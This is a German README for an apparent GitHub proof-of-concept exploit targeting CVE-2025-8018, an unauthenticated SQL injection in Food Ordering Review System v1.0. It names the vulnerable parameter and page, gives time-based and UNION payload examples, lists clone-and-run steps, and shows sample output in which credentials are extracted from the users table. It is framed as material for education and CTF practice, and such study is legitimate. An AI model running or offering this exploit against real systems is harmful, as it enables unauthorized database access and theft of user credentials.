
Python-Exploit-Skript für CVE-2025-8018, eine kritische SQL-Injection im Food Ordering Review System v1.0. Dieses Skript hilft Ihnen, die Schwachstelle mittels UNION- und zeitbasierter SQL-Injection zu testen, zu bestätigen und auszunutzen. Ideal für CTF-Übungen, ethisches Hacken und das Erlernen der Funktionsweise realer SQLi. Nur zu Bildungszwecken.
Dieses Repository bietet einen Python Proof-of-Concept (PoC) Exploit für CVE‑2025‑8018, eine hochriskante SQL-Injection-Schwachstelle, die im Food Ordering Review System v1.0 entdeckt wurde. Die Schwachstelle wird über den Parameter reg_Id in reservation_page.php ausgelöst.
/user/reservation_page.phpreg_Idusers-Tabelle, ohne AuthentifizierungSLEEP()UNION SELECT NULL,NULL,...requestsAbhängigkeiten installieren:
pip install requests
Verwendung Repository klonen:
git clone https://github.com/drackyjr/CVE-2025-8018.git
cd CVE-2025-8018
Ziel-URL aktualisieren:
Öffnen Sie cve-2025-8018.py und ändern Sie:
TARGET_URL = "http://TARGET-IP/user/reservation_page.php" Ersetzen Sie TARGET-IP mit der tatsächlichen Adresse des verwundbaren Systems.
Exploit-Skript ausführen:
python3 cve-2025-8018.py
Ausgabe
[*] Checking time-based SQLi with payload: 1 AND SLEEP(5)--
[+] Blind SQL injection confirmed!
[*] Testing how many columns the query expects...
[+] Looks like 3 columns work!
[*] Trying to extract data using UNION-based SQL injection...
[+] Found potential credentials in the response!
[*] Trying blind extraction fallback...
[+] Username is 7 characters long!
⚠️ Haftungsausschluss Dieser PoC wird ausschließlich zu Bildungszwecken bereitgestellt, z. B. für CTF-Herausforderungen, Cybersicherheitsschulungen oder Abwehrversuche auf Ihren eigenen Systemen.
Verwenden Sie dies nicht gegen Produktionssysteme oder Systeme, für die Sie keine ausdrückliche Erlaubnis zum Testen haben. Der Autor und alle verbundenen Parteien übernehmen keine Verantwortung für Missbrauch oder Schäden, die aus dem Code entstehen.